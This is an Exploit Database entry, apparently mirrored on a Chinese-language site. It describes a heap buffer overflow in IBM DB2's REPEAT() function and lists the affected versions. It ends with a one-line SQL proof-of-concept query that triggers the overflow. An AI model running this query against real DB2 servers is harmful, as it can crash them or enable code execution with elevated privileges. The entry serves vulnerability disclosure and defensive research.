IBM DB2 – ‘REPEAT()’ Local Heap Buffer Overflow

• Exploit Database
• 9 阅读

• 作者： Evgeny Legerov
  日期： 2010-01-27
• 类别：

  • local
  平台：

  • unix
• 来源：https://www.exploit-db.com/exploits/33572/

• source: https://www.securityfocus.com/bid/37976/info
  
  IBM DB2 is prone to a heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
  
  Attackers can exploit this issue to execute arbitrary code with elevated privileges or crash the affected application.
  
  The issue affects the following:
  
  IBM DB2 versions prior to 9.1 Fix Pack 9
  IBM DB2 9.7
  
  Other versions may also be affected. 
  
  SELECT REPEAT(REPEAT('1',1000),1073741825) FROM SYSIBM.SYSDUMMY1